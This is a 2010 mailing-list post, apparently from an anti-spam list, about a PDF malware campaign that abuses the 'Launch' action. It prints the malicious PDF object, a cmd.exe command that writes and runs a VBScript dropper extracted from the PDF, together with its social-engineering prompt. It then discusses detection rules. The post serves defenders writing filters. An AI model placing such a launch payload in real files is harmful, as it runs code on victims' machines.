new PDF "Launch" malware exploit (with sample)

Wed, 28 Apr 2010 11:02:00 -0700 

About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their "launch action".

Original article:
        http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
More info:
        http://www.sophos.com/blogs/sophoslabs/?p=9301

Yesterday morning, several of these showed up in my feeds.
Sample:
        http://puffin.net/software/spam/samples/0007_pdf_mal.txt


The bad news is that the social engineering part is well written
(terse with decent grammer in the body) and feels like the sort of
thing that would confuse/fool naive endusers.

Based on which accounts they're hitting, these may have been
created by last year's inline-PNG/RTF guy (who I'm pretty sure
is behind the recent zipped JPEG and now RTF campaigns).
If that's correct, we should expect more attacks.  He's smarter
AND more patient than pretty much all other spammers (he might
even be as smart as a tree squirrel - scary!).


The good news is there's all manner of easy to detect stuff that
shouldn't occur in "normal" PDFs. :)

Here's just the nifty Launch part (NOTE: for skimming clarity, I
removed several blank lines from around the original "Click" line):

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs 
&& echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo 
pf=f.ReadAll  >> script.vbs && echo s=InStr(pf,"'SS")  >> script.vbs && echo 
e=InStr(pf,"'EE")  >> script.vbs && echo s=Mid(pf,s,e-s)  >> script.vbs && echo 
Set z=fso.OpenTextFile("batscript.vbs", 2, True)  >> script.vbs && echo s = 
Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs 
&& batscript.vbs
Click the "open" button to view this document:)
 >>
>>
endobj


I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added "script.vbs" to my instant-death PDF word
scans.

I'll be asking some of my most diverse volunteers to run some
ham-PDF-only MassChecks tonight, and see if any of my new rules
mis-fire.  Given the number of times HTML "naughty" tags appear in
ham, I will resist assuming my "reasonable" restrictions won't hit
any.
        - "Chip"

Reply via email to